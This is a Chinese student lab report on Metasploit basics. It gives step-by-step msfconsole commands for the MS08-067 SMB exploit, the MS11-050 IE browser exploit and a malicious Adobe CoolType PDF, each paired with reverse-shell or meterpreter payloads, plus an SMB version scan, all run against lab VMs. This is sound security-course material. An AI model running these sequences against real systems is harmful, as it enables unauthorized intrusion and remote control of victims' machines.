首页 技术 正文
技术 2022年11月21日
0 收藏 801 点赞 2,779 浏览 1980 个字

20155323刘威良《网络对抗》Exp5 MSF基础应用

实践内容

本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:

1.1一个主动攻击实践,如ms08_067; (1分)

1.2 一个针对浏览器的攻击,如ms11_050;(1分)

1.3 一个针对客户端的攻击,如Adobe;(1分)

1.4 成功应用任何一个辅助模块。(0.5分)

以上四个小实践可不限于以上示例,并要求至少有一个是和其他所有同学不一样的,否则扣除0.5分。

实践过程

Windows服务渗透攻击——MS08-067安全漏洞

  • 攻击机:kali IP:192.168.11.129
  • 靶机:windows XP SP3 (English) IP:192.168.11.130

首先在kali中打开命令行进入msfconsole控制台,然后输入命令 search ms08_067查询攻击模块

20155323刘威良《网络对抗》Exp5 MSF基础应用

然后输入命令show payloads查看可用的攻击载荷,发现payload generic/shell_reverse_tcp可用,输入命令set payload generic/shell_reverse_tcp设置载荷。

输入set LHOST 192.168.11.129设置攻击机IP

输入set LPORT 5323设置端口

输入set RHOST 192.168.11.130设置靶机IP

输入set target 0设置自动选择目标系统类型

输入exploit开始攻击

一开始使用中文版xp一直提示无法创建,后来换了英文版xp才攻击成功

20155323刘威良《网络对抗》Exp5 MSF基础应用

systeminfo命令可查看靶机信息

20155323刘威良《网络对抗》Exp5 MSF基础应用

浏览器渗透攻击——MS11-050

  • 攻击机:kali IP:192.168.11.129

  • 靶机:windows XP SP3 (中文简体) IP:192.168.11.128

还是打开msfconsole控制台,然后输入命令use windows/browser/ms11_050_mshtml_cobjectelement设置攻击模块

输入set payload windows/meterpreter/reverese_http设置payload

输入set LHOST 192.168.11.129设置攻击机IP

输入set LPORT 5323设置端口

输入set URIPATH baidu设置统一资源标识符路径

输入set target 1

输入exploit开始攻击

20155323刘威良《网络对抗》Exp5 MSF基础应用

20155323刘威良《网络对抗》Exp5 MSF基础应用

然后在靶机上打开IE浏览器,输入刚刚生成的网址http://192.168.11.129:8080/baidu

20155323刘威良《网络对抗》Exp5 MSF基础应用

但是这里IE浏览器就失去反应了,询问了其他同学也没有解决方法。

针对Office软件的渗透攻击——MS10-087

还是打开msfconsole控制台,输入use windows/fileformat/adobe_cooltype_sing设置攻击模块

输入use windows/fileformat/adobe_cooltype_sing设置payload

输入set LHOST 192.168.11.129设置攻击机IP

输入set LPORT 5323设置端口

输入set FILENAME exp5_5336.pdf设置生成文件名

输入exploit开始攻击

这里我们生成了一个文件exp5_5336.pdf

20155323刘威良《网络对抗》Exp5 MSF基础应用

但是由于kali隐藏了部分文件夹,我们需要手动设置显示隐藏文件夹才能找到这个pdf文件

20155323刘威良《网络对抗》Exp5 MSF基础应用

输入back返回,然后输入use exploit/multi/handler开始监听

输入set payload windows/meterpreter/reverse_tcp反向连接tcp

输入set LHOST 192.168.11.129设置攻击机IP

输入set LPORT 5323设置端口

输入exploit开始攻击

20155323刘威良《网络对抗》Exp5 MSF基础应用

然后把生成的pdf文件传到xp系统中并且打开

20155323刘威良《网络对抗》Exp5 MSF基础应用

攻击成功,可以输入ipconfig查看ip信息

20155323刘威良《网络对抗》Exp5 MSF基础应用

成功应用任何一个辅助模块

打开msfconsole控制台输入show auxiliary查看辅助模块

输入use auxiliary/scanner/smb/smb_version选择辅助模块

输入show options查看需要设置什么并设置

20155323刘威良《网络对抗》Exp5 MSF基础应用

应用成功

20155323刘威良《网络对抗》Exp5 MSF基础应用

回答问题

(1)用自己的话解释什么是exploit,payload,encode

exploit: 就是利用发现的漏洞和配置好的信息攻击靶机的指令

payload:攻击载荷,在它传到靶机中后执行相应的代码

encode:编码器

实践总结与体会

这次实验并不困难,但是模块太多,第一次接触有点眼花缭乱,所以只能跟着其他同学做,有空希望自己可以试试更多的模块。还有第一个实践不知道为什么其他同学的中文xp系统可以攻击,我的xp关闭了防火墙,也可以和kali互ping,但是还是攻击失败,最后只能选择英文版xp。

离实战还缺些什么技术或步骤?

还差的很远,尝试过的模块只是九牛一毛,如果要实战还需要很多时间去研究其他模块。

相关推荐
python开发_常用的python模块及安装方法
adodb:我们领导推荐的数据库连接组件bsddb3:BerkeleyDB的连接组件Cheetah-1.0:我比较喜欢这个版本的cheeta…
日期:2022-11-24 点赞:878 阅读:8,996
Educational Codeforces Round 11 C. Hard Process 二分
C. Hard Process题目连接:http://www.codeforces.com/contest/660/problem/CDes…
日期:2022-11-24 点赞:807 阅读:5,510
下载Ubuntn 17.04 内核源代码
zengkefu@server1:/usr/src$ uname -aLinux server1 4.10.0-19-generic #21…
日期:2022-11-24 点赞:569 阅读:6,353
可用Active Desktop Calendar V7.86 注册码序列号
可用Active Desktop Calendar V7.86 注册码序列号Name: www.greendown.cn Code: &nb…
日期:2022-11-24 点赞:733 阅读:6,137
Android调用系统相机、自定义相机、处理大图片
Android调用系统相机和自定义相机实例本博文主要是介绍了android上使用相机进行拍照并显示的两种方式,并且由于涉及到要把拍到的照片显…
日期:2022-11-24 点赞:512 阅读:7,770
Struts的使用
一、Struts2的获取  Struts的官方网站为:http://struts.apache.org/  下载完Struts2的jar包,…
日期:2022-11-24 点赞:671 阅读:4,848